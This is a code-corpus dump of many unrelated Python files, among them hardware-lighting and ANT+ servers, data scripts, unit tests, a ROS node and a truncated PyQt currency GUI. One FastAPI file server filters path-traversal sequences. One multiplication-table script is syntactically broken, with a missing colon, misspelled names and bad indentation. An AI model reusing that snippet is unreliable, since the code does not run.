    removal of dead locals (the unused (ixi, iyi) lookup per pixel, the
    unused node_list/n aliases and the unused n_clusters counter).
    """
    out_image = PointSampleImage(in_image.calib_array, in_image.neighbour_array)

    # Build a graph with one node per calibrated pixel; edges connect
    # neighbouring active pixels, so connected components become blobs.
    # See sensors/pointsamplecam for the definition of neighbouring.
    G = nx.Graph()
    G.add_nodes_from(range(in_image.n_rows))
    for i in range(in_image.n_rows):
        if in_image.masks[i] & active_mask != 0:
            for j in in_image.neighbour_array[i]:
                if in_image.masks[j] & active_mask != 0:
                    G.add_edge(i, j)

    # NOTE(review): connected_component_subgraphs was removed in networkx 2.4;
    # if the project upgrades, replace with G.subgraph(c) over
    # nx.connected_components(G).
    clusters = nx.connected_component_subgraphs(G, copy=False)
    for cluster in clusters:
        # Find the closest pixel to the robot in this cluster.
        closest_i = None
        closest_distance = float('inf')
        for i in cluster.nodes():
            # calib_array[i,5] is the pre-computed distance sqrt(xr*xr + yr*yr)
            d = in_image.calib_array[i,5]
            if d < closest_distance:
                closest_i = i
                closest_distance = d
        if closest_i is not None:
            out_image.masks[closest_i] = in_image.masks[closest_i]

    return out_image
|
986,942 | 426be99cf83f2e8aae644b8d05a4955d96971fd3 | from corsair import init, set_color_corsair
from nzxt import set_color_nzxt
from razer import init_razer, set_color_razer, heartbeat_thread
import threading, time
from flask import Flask, request
from debounce import debounce
def from_hsv(hsv):
    """Convert an HSV triple (h in [0, 360), s and v in [0, 1]) to a
    [r, g, b] list of ints in 0-255."""
    h, s, v = hsv
    chroma = v * s
    x = chroma * (1 - abs((h / 60) % 2 - 1))
    offset = v - chroma
    # Candidate (r, g, b) before the value offset, one per 60-degree sector.
    sectors = (
        (0, [chroma, x, 0]),
        (60, [x, chroma, 0]),
        (120, [0, chroma, x]),
        (180, [0, x, chroma]),
        (240, [x, 0, chroma]),
        (300, [chroma, 0, x]),
    )
    rgb = [0, 0, 0]
    for lower, candidate in sectors:
        if lower <= h < lower + 60:
            rgb = candidate
            break
    return [int((channel + offset) * 255) for channel in rgb]
# Initialize the device SDKs at import time.
init()
init_razer()

# Current color state as [hue 0-360, saturation 0-1, value/brightness 0-1].
current_hsv = [270, 1, 1]

@debounce(2)
def set_colors_hsv():
    # Push current_hsv to all devices (debounced to at most once per 2 s).
    current_colors = from_hsv(current_hsv)
    set_color_corsair(current_colors[0], current_colors[1], current_colors[2])
    set_color_razer(current_colors[0], current_colors[1], current_colors[2])
    set_color_nzxt(current_colors[0], current_colors[1], current_colors[2])
    # NOTE(review): the three calls below duplicate the ones above —
    # possibly a reliability workaround, possibly copy-paste; confirm.
    set_color_corsair(current_colors[0], current_colors[1], current_colors[2])
    set_color_razer(current_colors[0], current_colors[1], current_colors[2])
    set_color_nzxt(current_colors[0], current_colors[1], current_colors[2])

set_colors_hsv()
app = Flask(__name__)

@app.route('/')
def hello_world():
    # Liveness check.
    return 'Hello, World!'
@app.route('/set', methods=['POST'])
def set_colors_route():
    # Set an explicit RGB color from a JSON body {"r":..,"g":..,"b":..}.
    # NOTE(review): current_hsv is not updated and set_color_nzxt is not
    # called here, unlike set_colors_hsv — confirm intended.
    print(request.json)
    r = request.json['r']
    g = request.json['g']
    b = request.json['b']
    set_color_corsair(r, g, b)
    set_color_razer(r, g, b)
    return "ok"
@app.route('/hb/on', methods=['GET'])
def hb_on_route():
    # HomeBridge "on": restore full brightness only if currently off.
    if current_hsv[2] == 0:
        current_hsv[2] = 1
        set_colors_hsv()
    return "ok"

@app.route('/hb/off', methods=['GET'])
def hb_off_route():
    # HomeBridge "off": value 0 turns the LEDs off.
    current_hsv[2] = 0
    set_colors_hsv()
    return "ok"

@app.route('/hb/status', methods=['GET'])
def hb_status_route():
    # "1" if any brightness, "0" if off.
    if current_hsv[2] > 0:
        return "1"
    else:
        return "0"
@app.route('/hb/saturation/set/<saturation>', methods=['GET'])
def hb_saturation_set_route(saturation):
    # HomeBridge sends saturation as 0-100; stored internally as 0-1.
    current_hsv[1] = float(saturation) / 100
    set_colors_hsv()
    return "ok"

@app.route('/hb/saturation/status', methods=['GET'])
def hb_saturation_status_route():
    return str(current_hsv[1] * 100)

@app.route('/hb/brightness/set/<brightness>', methods=['GET'])
def hb_brightness_set_route(brightness):
    # HomeBridge sends brightness as 0-100; stored internally as value 0-1.
    current_hsv[2] = float(brightness) / 100
    set_colors_hsv()
    return "ok"

@app.route('/hb/brightness/status', methods=['GET'])
def hb_brightness_status_route():
    return str(current_hsv[2] * 100)
@app.route('/hb/hue/set/<hue>', methods=['GET'])
def hb_hue_set_route(hue):
    # Hue is passed in degrees (0-360).
    current_hsv[0] = float(hue)
    set_colors_hsv()
    return "ok"

@app.route('/hb/hue/status', methods=['GET'])
def hb_hue_status_route():
    return str(current_hsv[0])

# Listen on all interfaces; port 80 usually requires elevated privileges.
app.run(host='0.0.0.0', port=80)
986,943 | 8e67898af8e1d8a24681d4222f972d2fd3f5507a | # github.com/spokenlore
# Project Euler Problem 8
# What is the largest product that can be made with 13 consecutive numbers in this 1000 digit number?
# Answer: 23514624000
import time
from math import pow
fullNum = 7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450
def largestConsecutiveProduct(number, numDigits):
    """Return the largest product of `numDigits` consecutive decimal digits of `number`.

    Also prints the winning digit window.  The previous implementation ignored
    both parameters (it read the global `fullNum` and hard-coded window logic
    around 13-digit magnitudes) and mishandled zero digits; this version slides
    a window over the decimal string representation instead.
    """
    digits = str(number)
    maxProduct = 0
    maxDigits = ''
    for start in range(len(digits) - numDigits + 1):
        window = digits[start:start + numDigits]
        product = 1
        for d in window:
            product *= int(d)
        if product > maxProduct:
            maxProduct = product
            maxDigits = window
    print(maxDigits)
    return maxProduct
def calculateProduct(number):
    """Return the product of the decimal digits of `number` (1 if number <= 0).

    Uses floor division: the original `number / 10` is Python-2 only — under
    Python 3 it yields floats and the loop never terminates correctly.
    """
    product = 1
    while number > 0:
        product *= number % 10
        number //= 10
    return product
# Test case for calculateProduct (of digits)
# print(calculateProduct(982387238))
# Expected answer for Project Euler 8 with a 13-digit window: 23514624000.
# print() call form works under both Python 2 and 3 for a single argument.
print(largestConsecutiveProduct(fullNum, 13))
986,944 | 269ad5fa21b488f306cbfd5d9080e44fdfea4a83 | #!/usr/bin/env python
import sys
import time
import platform
import tkinter as tk
from ant.core import driver
from ant.core import node
from usb.core import find
from PowerMeterTx import PowerMeterTx
from config import DEBUG, LOG, NETKEY, POWER_SENSOR_ID
antnode = None
power_meter = None
def stop_ant():
    """Shut down the ANT+ transmitter channel, then the ANT node.

    Both `power_meter` and `antnode` are module globals that stay None/unset
    if setup failed, hence the truthiness guards.  The meter is closed before
    the node so the channel is released while the node is still running.
    """
    if power_meter:
        print("Closing power meter")
        power_meter.close()
        power_meter.unassign()
    if antnode:
        print("Stopping ANT node")
        antnode.stop()
# On Windows, register a console control handler so closing the console window
# still shuts the ANT hardware down cleanly; `pywin32` records whether that
# succeeded so the `finally` clause below knows if it must call stop_ant() itself.
pywin32 = False
if platform.system() == 'Windows':
    def on_exit(sig, func=None):
        # Called by Windows on Ctrl+C / console close.
        stop_ant()
    try:
        import win32api
        win32api.SetConsoleCtrlHandler(on_exit, True)
        pywin32 = True
    except ImportError:
        print("Warning: pywin32 is not installed, use Ctrl+C to stop")
def disable_event():
    """No-op WM_DELETE_WINDOW handler: ignore window-close requests."""
try:
    # Scan for an ANT+ USB stick (Garmin/Dynastream vendor id 0x0fcf,
    # USB1/USB2 product ids) and keep the first one we can open.
    devs = find(find_all=True, idVendor=0x0fcf)
    for dev in devs:
        if dev.idProduct in [0x1008, 0x1009]:
            stick = driver.USB2Driver(log=LOG, debug=DEBUG, idProduct=dev.idProduct, bus=dev.bus, address=dev.address)
            try:
                stick.open()
            except Exception:
                # FIX: was a bare `except:`, which also swallowed
                # KeyboardInterrupt/SystemExit during device probing.
                continue
            stick.close()
            break
    else:
        # for/else: no stick could be opened.
        print("No ANT devices available")
        if getattr(sys, 'frozen', False):
            input()  # keep the console open when running as a frozen exe
        sys.exit()
    antnode = node.Node(stick)
    print("Starting ANT node")
    antnode.start()
    key = node.Network(NETKEY, 'N:ANT+')
    antnode.setNetworkKey(0, key)
    print("Starting power meter with ANT+ ID " + repr(POWER_SENSOR_ID))
    try:
        # Create the power meter object and open it
        power_meter = PowerMeterTx(antnode, POWER_SENSOR_ID)
        power_meter.open()
    except Exception as e:
        print("power_meter error: " + repr(e))
        power_meter = None
    # Tiny always-on-top window with a 0-1000 W slider.
    master = tk.Tk()
    master.title("Bot")
    master.geometry("200x50")
    master.resizable(False, False)
    master.call('wm', 'attributes', '.', '-topmost', '1')
    master.protocol("WM_DELETE_WINDOW", disable_event)
    w = tk.Scale(master, from_=0, to=1000, length=200, orient=tk.HORIZONTAL)
    w.pack()
    last = 0
    stopped = True
    print("Main wait loop")
    while True:
        try:
            t = int(time.time())
            if t >= last + 1:
                # Broadcast at most once per second.
                power = w.get()
                if power:
                    power_meter.update(power)
                    stopped = False
                elif not stopped:
                    # Send one final zero so receivers see the drop to 0 W.
                    power_meter.update(power)
                    stopped = True
                last = t
            master.update_idletasks()
            master.update()
        except (KeyboardInterrupt, SystemExit):
            break
except Exception as e:
    print("Exception: " + repr(e))
    if getattr(sys, 'frozen', False):
        input()
finally:
    if not pywin32:
        stop_ant()
|
986,945 | 6f6f3c15ecc4b3e9235bad0104f92fbc670dc5ee | import pandas as pd
import os
import numpy as np
import matplotlib.pyplot as plt
# Load the UCI "adult" census dataset and shuffle the rows.
df = pd.read_csv("~/Desktop/adult.txt", header=None)
df = df.iloc[np.random.permutation(len(df))]
df.columns = ["age", "workclass", "fnlwgt", "education", "education-num", "maritalstatus", "occupation", "relationship",
              "race", "sex", "capital-gain", "capital-loss", "hours-per-week", "nativecountry", "salary"]
# Encode every categorical column as integer labels.
# NOTE(review): reusing one LabelEncoder per column is fine because fit_transform
# refits it each time; the fitted mapping for earlier columns is not retained.
from sklearn import preprocessing
le = preprocessing.LabelEncoder()
df.workclass = le.fit_transform(df.workclass)
df.education = le.fit_transform(df.education)
df.maritalstatus = le.fit_transform(df.maritalstatus)
df.occupation = le.fit_transform(df.occupation)
df.relationship = le.fit_transform(df.relationship)
df.race = le.fit_transform(df.race)
df.sex = le.fit_transform(df.sex)
df.nativecountry = le.fit_transform(df.nativecountry)
df.salary = le.fit_transform(df.salary)
# 70/30-ish train/test split on the shuffled frame (22793 rows to train).
df_train_cont, df_test_cont = df[:22793], df[22793:]
df_train = df_train_cont[df_train_cont.columns[0:14]]
df_labels = df_train_cont[df_train_cont.columns[14]]
df_test = df_test_cont[df_test_cont.columns[0:14]]
df_test_label = df_test_cont[df_test_cont.columns[14]]
# FIX: DataFrame.as_matrix() was deprecated and removed in pandas 1.0;
# to_numpy() is the supported replacement and returns the same ndarray.
train_matrix = df_train.to_numpy()
trainList = df_train.values.tolist()
trainLabels = df_labels.values.tolist()
986,946 | 9f9bf15aeb4652b25d9d9057d757ab5244b72786 | import psutil
import sys
import getopt
def analyze(pid):
    """Sample memory and CPU usage of process `pid` and write the results
    to component_overhead.txt.

    cpu_percent(interval=1) blocks for one second to measure utilization.
    """
    manager = psutil.Process(pid)
    mem_percent = manager.memory_percent()
    cpu_percent = manager.cpu_percent(interval=1)
    # Convert percentages to absolute units.  FIX: total RAM was previously a
    # hard-coded 61.9 GB machine-specific constant; query the real total instead.
    total_mb = psutil.virtual_memory().total / (1024 * 1024)
    mem_mb = mem_percent * total_mb * 0.01
    cpu_core = cpu_percent * 0.01
    with open("component_overhead.txt", 'w') as f:
        f.write(f'mem_usage: {mem_mb} MB\n')
        f.write(f'cpu_usage: {cpu_core} core\n')
if __name__ == '__main__':
    # Usage: script --pid=<pid>
    opts, args = getopt.getopt(sys.argv[1:], '', ['pid='])
    pid = None
    for name, value in opts:
        if name == '--pid':
            pid = value
    # FIX: previously `pid` was undefined (NameError) when --pid was omitted.
    if pid is None:
        sys.exit('usage: analyze --pid=<pid>')
    analyze(int(pid))
|
def updateArray(arr, n, idx, element):
    """Insert `element` into `arr` before position `idx`.

    `n` is the list's original length, supplied by the judge harness; it is
    not needed because list slice assignment handles the shift itself.
    """
    arr[idx:idx] = [element]
#{
# Driver Code Starts
#Initial Template for Python 3
#contributed by RavinderSinghPB
if __name__ == '__main__':
tcs= int(input())
for _ in range(tcs):
n=int(input())
idx,element=[int(x) for x in input().split()]
arr=[i+1 for i in range(n)]
updateArray(arr,n,idx,element)
print(arr[idx])
# } Driver Code Ends
|
986,948 | 5244c694033884528e956725551c9dd772687316 | from fastapi import FastAPI, HTTPException
from fastapi.responses import RedirectResponse, FileResponse
from os.path import isdir, isfile
from typing import Optional
app = FastAPI()
@app.get('/')
def return_file(filename: Optional[str] = ''):
    """Serve ./root/<filename>, restricted to .html/.txt files.

    FIX: the f-strings had lost their `{filename}` placeholder (they contained
    the literal text "(unknown)"), so every request resolved to the same
    non-existent path and the 404 message never echoed the requested name.
    """
    if not filename:
        return RedirectResponse('/?filename=index.html')
    # Strip traversal sequences; the loop catches nested forms such as '....//'
    # that a single replace pass would leave behind.
    filepath = f'./root/{filename}'.replace('../', '').replace('..\\', '').rstrip('/').rstrip('\\')
    while '../' in filepath or '..\\' in filepath:
        filepath = filepath.replace('../', '').replace('..\\', '')
    if filepath.split('.')[-1] not in ('html', 'txt'):
        raise HTTPException(
            status_code=406,
            detail='I will NOT let you open it.'
        )
    if not isdir(filepath) and isfile(filepath):
        return FileResponse(filepath)
    raise HTTPException(
        status_code=404,
        detail=f"Requested file('/{filename}') does not exist."
    )
@app.get('/favicon.ico')
def fake_favicon():
    """Serve an empty body for favicon requests so browsers stop retrying."""
    return ""
|
986,949 | d1289b5516923f12390a3ba8c14c055d4c406e35 | import unittest
from pubnub.endpoints.presence.get_state import GetState
try:
from mock import MagicMock
except ImportError:
from unittest.mock import MagicMock
from pubnub.pubnub import PubNub
from tests.helper import pnconf, sdk_name
from pubnub.managers import TelemetryManager
class TestGetState(unittest.TestCase):
    """Unit tests for GetState's URL path and query-parameter construction."""
    def setUp(self):
        # A MagicMock stands in for the real PubNub client; only the attributes
        # GetState reads (config, sdk name, uuid, token getter) are provided.
        self.pubnub = MagicMock(
            spec=PubNub,
            config=pnconf,
            sdk_name=sdk_name,
            uuid=None,
            _get_token=lambda: None
        )
        self.pubnub.uuid = "UUID_GetStateTest"
        self.pubnub._telemetry_manager = TelemetryManager()
        self.get_state = GetState(self.pubnub)
    def test_get_state_single_channel(self):
        # Single channel: the channel name appears directly in the path.
        self.get_state.channels('ch')
        self.assertEqual(self.get_state.build_path(), GetState.GET_STATE_PATH % (pnconf.subscribe_key,
                                                                                 "ch",
                                                                                 self.pubnub.uuid))
        self.assertEqual(self.get_state.build_params_callback()({}), {
            'pnsdk': sdk_name,
            'uuid': self.pubnub.uuid,
        })
        self.assertEqual(self.get_state._channels, ['ch'])
    def test_get_state_single_group(self):
        # Channel-group only: the path's channel slot is the "," placeholder
        # and the group is carried in the 'channel-group' query parameter.
        self.get_state.channel_groups('gr')
        self.assertEqual(self.get_state.build_path(), GetState.GET_STATE_PATH % (pnconf.subscribe_key,
                                                                                 ",",
                                                                                 self.pubnub.uuid))
        self.assertEqual(self.get_state.build_params_callback()({}), {
            'pnsdk': sdk_name,
            'uuid': self.pubnub.uuid,
            'channel-group': 'gr'
        })
        assert len(self.get_state._channels) == 0
        self.assertEqual(self.get_state._groups, ['gr'])
|
986,950 | 208cc5472475cf334989712613886d1c9e926247 | #! /usr/bin/env python
print("Starting tempnode.py")
import rospy
from std_msgs.msg import String
from azmutils import dynamic_euclid_dist, str_to_obj, obj_to_str
import json
class tempnode():
    """
    This class is adapted from theconstructsim.com ROS Basics in 5 Days course - Using Python Classes in ROS
    It implements a pseudo action server to move the HSR to coordinate nav goals
    provided through the /azm_nav/coord_goal_listener topic
    Gives simple result feeback thru /azm_nav/goal_result
    """
    def __init__(self):
        # Base node inits
        rospy.loginfo("Initiating tempnode")
        rospy.init_node('tempnode')
        self.ctrl_c = False              # set True by the shutdown hook to stop publish loops
        self.rate = rospy.Rate(10)       # 10hz
        rospy.on_shutdown(self.shutdownhook)
        # Goal publishing inits
        self.pub = rospy.Publisher('/azm_nav/semantic_label_additions', String, queue_size=1, latch=True)
        self.sub = rospy.Subscriber('/azm_nav/semantic_manual_add', String, self.cb)
        self.semantic_goal = rospy.Publisher('/azm_nav/semantic_goal_listener', String, queue_size=1)
        self.goal_sub = rospy.Subscriber('/azm_nav/goal_result', String, self.goal_cb)
        self.reached = True              # True once the current goal is reported reached
    def publish_once(self, topic, msg, content="message"):
        # Busy-waits until the topic has at least one subscriber, then publishes once.
        rospy.loginfo("Attempting to publish {} to {}".format(content, topic.name))
        while not self.ctrl_c:
            connections = topic.get_num_connections()
            if connections > 0:
                topic.publish(msg)
                rospy.loginfo("Message published to {}".format(topic.name))
                break
            else:
                #rospy.loginfo("No subscribers on {}, sleeping.".format(topic.name))
                pass
    def cb(self, msg):
        # Wrap a manually-added label name into a semantic-label record and publish it.
        _t = {"name":msg.data,"type":"test","coords":[1,2,3],"others":{}}
        _msg = String()
        _msg.data = obj_to_str(_t)
        self.publish_once(self.pub, _msg)
    def shutdownhook(self):
        # works better than the rospy.is_shutdown()
        self.ctrl_c = True
    def do_nav_example(self):
        # Sends each semantic goal in turn, waiting for goal_cb to flag arrival.
        goals = ["shelves", "grannyAnnie", "exit"]
        stage = 0
        stage_done = 0
        while not stage_done == len(goals):
            if self.reached:
                self.reached = False
                stage += 1
            if stage_done < stage:
                msg = String()
                msg.data = goals[stage_done]
                print("directing robot to {}".format(goals[stage_done]))
                self.publish_once(self.semantic_goal, msg, "goal")
                stage_done += 1
            rospy.sleep(0.5)
        print("all goals sent")
    def goal_cb(self, msg):
        # Result feedback from the navigation stack on /azm_nav/goal_result.
        if msg.data == 'success':
            print("reached goal")
            self.reached = True
        else:
            print("something went wrong with navigation")
            print(msg.data)
if __name__ == '__main__':
    print("executing tempnode.py as main")
    print("Creating tempnode obj")
    # FIX: the original did `tempnode = tempnode()`, rebinding the class name
    # to the instance; use a distinct variable so the class stays accessible.
    node_instance = tempnode()
    node_instance.do_nav_example()
    print("tempnode.py is spinning")
    rospy.spin()
|
986,951 | 39c4065cc55672b67a4712d074bae645ba3387d7 | import csv
from operator import itemgetter
from sort import insertion_sort, merge_sort, heap_sort, quick_sort,bucket_sort,radix_sort
import time
def readFilesAndSort(filenameToSave, algorithm_choice):
    """Read '<filenameToSave>.csv', sort its rows by total price, write the
    sorted rows to a new CSV, and return the elapsed sort+read time in seconds.

    algorithm_choice: 1 = merge sort, 2 = quick sort, 3 = heap sort.
    Returns None for any other choice (unchanged from the original contract).
    Rows are loaded as [total_price, description, price, shipping] so the
    sort key is the leading total_price.
    """
    filename = filenameToSave + '.csv'
    data = []
    start_time = time.time()
    # FIX: the input file was never closed; `with` guarantees cleanup.
    with open(filename, "r+") as unsorted_csv:
        reader = csv.reader(unsorted_csv)
        unsorted_csv.readline()  # skip the header row
        for row in reader:
            data.append([float(row[3]), row[0], float(row[1]), float(row[2])])
    if algorithm_choice == 1:
        merge_sort.merge_sort(data)
        end_time = time.time() - start_time
        _write_sorted_csv(filename + "_mergesort.csv", data)
        return end_time
    if algorithm_choice == 2:
        data = quick_sort.quick_sort(data)
        end_time = time.time() - start_time
        _write_sorted_csv(filename + "_quicksort.csv", data)
        return end_time
    if algorithm_choice == 3:
        heap_sort.heap_sort(data)
        end_time = time.time() - start_time
        _write_sorted_csv(filename + "_heapsort.csv", data)
        return end_time

def _write_sorted_csv(out_name, data):
    """Write sorted rows to `out_name` (shared by all three algorithm branches)."""
    fieldnames_for_csv = ['item_description', 'item_price', 'item_shipping', 'total_price']
    with open(out_name, "w+") as sorted_csv_data:
        sorted_data_writer = csv.DictWriter(sorted_csv_data, fieldnames=fieldnames_for_csv)
        sorted_data_writer.writeheader()
        for items in data:
            sorted_data_writer.writerow({'item_description': items[1], 'item_price': items[2],
                                         'item_shipping': items[3], "total_price": items[0]})
|
986,952 | 1ee0e4c22c84053248de76d947603166669367b7 | import re
def solution(s):
    """Title-case `s`: lowercase everything, then uppercase the first
    character and any letter that immediately follows whitespace.

    Non-letters are left untouched (upper() is a no-op on them), so
    e.g. "3people unFollowed me" -> "3people Unfollowed Me".
    """
    out = []
    capitalize_next = True  # position 0 behaves like "after whitespace"
    for ch in s.lower():
        out.append(ch.upper() if capitalize_next else ch)
        capitalize_next = ch.isspace()
    return "".join(out)
|
986,953 | da741576c63a69e34117a120d1c66a67ea5fff18 | from computer import Computer
def test_case_pt_1():
    """Run the day-5 part-1 echo example: prints the value given as input."""
    program = "3,0,4,0,99"
    Computer([int(code) for code in program.split(",")]).solve()
def test_case_pt_2():
    """Run the day-5 part-2 comparison/jump example programs in order.

    Expected console output per program (input supplied interactively):
      1. "1" if input=8 else "0"   (position-mode equals)
      2. "1" if input<8 else "0"   (position-mode less-than)
      3. "1" if input=8 else "0"   (immediate-mode equals)
      4. "1" if input<8 else "0"   (immediate-mode less-than)
      5. "1" if input!=0 else "0"  (position-mode jump)
      6. "1" if input!=0 else "0"  (immediate-mode jump)
      7. "999" if input<8, "1000" if input=8, else "1001"
    """
    programs = [
        "3,9,8,9,10,9,4,9,99,-1,8",
        "3,9,7,9,10,9,4,9,99,-1,8",
        "3,3,1108,-1,8,3,4,3,99",
        "3,3,1107,-1,8,3,4,3,99",
        "3,12,6,12,15,1,13,14,13,4,13,99,-1,0,1,9",
        "3,3,1105,-1,9,1101,0,0,12,4,12,99,1",
        (
            "3,21,1008,21,8,20,1005,20,22,107,8,21,20,1006,20,31,"
            "1106,0,36,98,0,0,1002,21,125,20,4,20,1105,1,46,104"
            ",999,1105,1,46,1101,1000,1,20,4,20,1105,1,46,98,99"
        ),
    ]
    for program in programs:
        Computer([int(code) for code in program.split(",")]).solve()
if __name__ == "__main__":
test_case_pt_1()
test_case_pt_2()
with open("05_input", "r") as f:
opcodes = [int(code) for code in f.read().split(",")]
Computer(opcodes, inputs=[1]).solve()
with open("05_input", "r") as f:
opcodes = [int(code) for code in f.read().split(",")]
Computer(opcodes, inputs=[5]).solve()
|
986,954 | 9d56ccde9ef7a52afcb1af5205e229b7d5d17eea | import unittest
from transform import view_transform, scale, translate
from point import Point
from vector import Vector
import matrix
from matrix import Matrix
class TestTransform(unittest.TestCase):
    """Unit tests for view_transform (the world-to-camera view matrix)."""
    def test_transform1(self):
        # Default orientation (looking down -z): the view matrix is identity.
        pfrom = Point(0, 0, 0)
        pto = Point(0, 0, -1)
        vup = Vector(0, 1, 0)
        t = view_transform(pfrom, pto, vup)
        I = Matrix([[1, 0, 0, 0],
                    [0, 1, 0, 0],
                    [0, 0, 1, 0],
                    [0, 0, 0, 1]])
        self.assertTrue(matrix.equals(I, t))
    def test_transform2(self):
        # Looking in the +z direction mirrors x and z (like scale(-1, 1, -1)).
        pfrom = Point(0, 0, 0)
        pto = Point(0, 0, 1)
        vup = Vector(0, 1, 0)
        t = view_transform(pfrom, pto, vup)
        s = scale(-1, 1, -1)
        self.assertTrue(matrix.equals(s, t))
    def test_transform3(self):
        # Moving the eye moves the world in the opposite direction.
        pfrom = Point(0, 0, 8)
        pto = Point(0, 0, 0)
        vup = Vector(0, 1, 0)
        t = view_transform(pfrom, pto, vup)
        self.assertTrue(matrix.equals(translate(0, 0, -8), t))
    def test_transform4(self):
        # Arbitrary view: compare against the reference matrix from
        # "The Ray Tracer Challenge" (values rounded to 5 decimals).
        pfrom = Point(1, 3, 2)
        pto = Point(4, -2, 8)
        vup = Vector(1, 1, 0)
        t = view_transform(pfrom, pto, vup)
        m = Matrix([[-0.50709, 0.50709, 0.67612, -2.36643],
                    [ 0.76772, 0.60609, 0.12122, -2.82843],
                    [-0.35857, 0.59761, -0.71714, 0.00000],
                    [ 0.00000, 0.00000, 0.00000, 1.00000]])
        self.assertTrue(matrix.equals(m, t))
|
986,955 | d4009345b03eb733a7a61312e7dfde2ece1ff512 | for indice in range (32,36):
print("Tabla del ", indice)
for elemento in range(1,11)
resultado = indice*elemento
print("{2} x {0} = {1}".format(elemnto,resultado,indice))
print()
print()
print("otros valores")
print()
tablas= [21, 34, 54, 65,76]
for indicedice in tablas:
print("Tablas del", indice)
for elemento in range(1,11):
resultado = indice*elemnto
print("{2} x {0} = {1}".format(elemnto,resultado,indice))
print() |
986,956 | 98bd1b6f9006938d67e4de658f213de88af3b43e | """Establishes connection to `.ui` file and loads GUI"""
import os
import sys
import qt5reactor
from PyQt5 import uic
from PyQt5 import QtCore
from PyQt5.QtGui import QIcon, QFont
from PyQt5.QtWidgets import QMainWindow, QApplication, QTableWidgetItem
from twisted.internet import reactor, error
from scrapy import crawler
from Gui import gui_warnings
from Gui.get_path import GUI_DIR, DB_DIR, MAIN_FILE, ICON
from Gui.load_db import create_database, select_records, load_all
from Gui.graphs import Canvas
from currency_scraper.currency_scraper.spiders.investor import InvestorSpider
TITLE = "Currency Converter"
class MainWindow(QMainWindow):
    """Implements logic into static GUI"""
    def __init__(self):
        super(MainWindow, self).__init__()
        uic.loadUi(MAIN_FILE, self)
        self.setWindowTitle(TITLE)
        self.setWindowIcon(QIcon(ICON))
        # string to handle number values (digits typed so far on the converter keypad)
        self.arg_nums = []
        """
        ADDING FUNCTIONALITY - WIDGET NAMES FOUND INSIDE .UI FILE
        """
        # graph, history and title
        self.choose_currency.currentTextChanged.connect(self.on_chosen_currency)
        self.choose_relation_currency.currentTextChanged.connect(self.on_chosen_relation_currency)
        # load currency values and change symbols
        self.choose_currency_conversion_top.currentTextChanged.connect(
            lambda: self.on_chosen_currency_combobox(self.choose_currency_conversion_top)
        )
        self.choose_currency_conversion_bottom.currentTextChanged.connect(
            lambda: self.on_chosen_currency_combobox(self.choose_currency_conversion_bottom)
        )
        # determine which label was selected with a click
        # logic for buttons is implemented within on_mouse_selected_currency
        self.currency_value_top.mouseReleaseEvent = lambda event: self.on_mouse_selected_currency(
            event, self.currency_value_top
        )
        self.currency_value_bottom.mouseReleaseEvent = lambda event: self.on_mouse_selected_currency(
            event, self.currency_value_bottom
        )
        # clear and back buttons have their own functionalities
        self.clear_button.clicked.connect(self.on_clear_button)
        self.back_button.clicked.connect(self.on_back_button)
        # update and delete buttons
        self.update_db_button.clicked.connect(self.on_clicked_update)
        self.delete_db_button.clicked.connect(gui_warnings.on_clicked_delete)
    def on_chosen_currency(self):
        """Shows title, table and graph for selected currency on `choose_currency` combobox"""
        main_currency_title = self.choose_currency.currentText()
        # the string needs to be modified to be compatible with the database values
        main_currency = main_currency_title.replace(" ", "_").lower()
        relation_currency = self.choose_relation_currency.currentText().replace(" ", "_").lower()
        # graph — needs at least two records to plot a line
        if len(load_all(main_currency)) < 2:
            gui_warnings.on_loading_values()
        else:
            try:
                canvas = Canvas(relation_currency, self)
                canvas.plot(main_currency)
            except ValueError:
                pass  # plots empty graph if main_currency = relation_currency
            self.clear_graph_layout(self.graph_layout)
            self.graph_layout.addWidget(canvas)
        # title
        self.gui_title.setText(main_currency_title)
        # table
        self.currency_table.setRowCount(0)
        currency_list = [
            "Brazilian Real",
            "American Dollar",
            "European Euro",
            "British Pound",
            "Japanese Yen",
            "Swiss Frank",
            "Canadian Dollar",
            "Australian Dollar"
        ]
        # Swap each candidate to the front; when it matches the selection the
        # remaining list becomes the table's column headers.
        for currency in currency_list:
            temp = currency_list[currency_list.index(currency)]
            currency_list[currency_list.index(currency)] = currency_list[0]
            currency_list[0] = temp
            if main_currency_title == currency:
                self.currency_table.setHorizontalHeaderLabels((*currency_list[1:], "Date"))
                # from https://www.youtube.com/watch?v=l2OoXj1Z2hM&t=411s
                records = enumerate(load_all(main_currency))
                for row_num, row_data in records:
                    self.currency_table.insertRow(row_num)
                    for column_num, data in enumerate(row_data):
                        self.currency_table.setItem(
                            row_num, column_num, QTableWidgetItem(str(data))
                        )
    def on_chosen_relation_currency(self):
        """
        Shows graph for selected currency on `choose_relation_currency` combobox
        in relation to selected currency on `choose_currency` combobox
        """
        main_currency = self.choose_currency.currentText().replace(" ", "_").lower()
        relation_currency = self.choose_relation_currency.currentText().replace(" ", "_").lower()
        if len(load_all(main_currency)) < 2:
            gui_warnings.on_loading_values()
        else:
            try:
                canvas = Canvas(relation_currency, self)
                canvas.plot(main_currency.replace(" ", "_").lower())
            except ValueError:
                pass
            self.clear_graph_layout(self.graph_layout)
            self.graph_layout.addWidget(canvas)
    # from https://stackoverflow.com/a/10067548/13825145
    def clear_graph_layout(self, layout):
        # Remove and delete every widget currently held by the layout.
        while layout.count():
            child = layout.takeAt(0)
            if child.widget():
                child.widget().deleteLater()
    def on_chosen_currency_combobox(self, combobox):
        """
        Changes currency symbol and loads database value for the currency selected
        with the chosen widget
        """
        main_currency = combobox.currentText()
        main_currency = main_currency.replace(" ", "_").lower()
        # currency name -> display symbol
        switch_cases = {
            "brazilian_real": "R$",
            "american_dollar": "$",
            "european_euro": "€",
            "british_pound": "£",
            "japanese_yen": "¥",
            "swiss_frank": "CHF",
            "canadian_dollar": "$",
            "australian_dollar": "$"
        }
        case = switch_cases.get(main_currency)
        symbol_top = self.currency_value_top.text().split()[0]
